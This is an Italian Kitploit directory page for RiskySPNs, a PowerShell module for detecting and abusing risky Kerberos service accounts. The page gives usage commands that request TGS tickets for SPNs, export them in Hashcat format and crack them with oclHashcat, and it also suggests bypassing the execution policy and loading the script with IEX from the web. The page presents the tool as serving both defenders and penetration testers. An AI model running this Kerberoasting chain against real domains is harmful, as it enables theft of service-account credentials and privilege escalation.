Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RiskySPN — Rileva e abusa di SPN rischiosi | Kitploit
Strumenti/GitHubGitHub/cyberark/riskyspn
Password CrackingEscalation di PrivilegiPenetration TestingAutenticazioneRed Teaming
GitHubcyberark/riskyspn

RiskySPN

Rileva e abusa di SPN rischiosi

Vedi Repository
265739 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

RiskySPNs

RiskySPNs è una raccolta di script PowerShell focalizzata sul rilevamento e l'abuso di account associati a SPN (Service Principal Name). Questo modulo può assistere i blue team nell'identificare SPN potenzialmente rischiosi, nonché i red team nell'escalation dei privilegi sfruttando Kerberos e Active Directory.

Per informazioni dettagliate: http://www.cyberark.com/blog/service-accounts-weakest-link-chain/

Utilizzo

Installare il modulo

root@kitploit:~
Import-Module .\RiskySPNs.psm1

Oppure carica solo lo script (puoi anche usare IEX dal web)

root@kitploit:~
. .\Find-PotentiallyCrackableAccounts.ps1

Assicurati che Set-ExecutionPolicy sia Unrestricted o Bypass

Ottenere informazioni su una funzione (molto dettagliato :))

root@kitploit:~
Get-Help Get-TGSCipher -Full

Tutte le funzioni hanno anche la modalità -Verbose

Cerca SPN vulnerabili

Trova account vulnerabili

root@kitploit:~
Find-PotentiallyCrackableAccounts

Sensitive + RC4 = $$$

Genera un report completo e dettagliato sugli account vulnerabili (CISO <3)

root@kitploit:~
Export-PotentiallyCrackableAccounts

Ottieni ticket

Richiedi Kerberos TGS per SPN

root@kitploit:~
Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"

Oppure

root@kitploit:~
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher

Le cose divertenti :)

root@kitploit:~
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3
Scarica lo strumento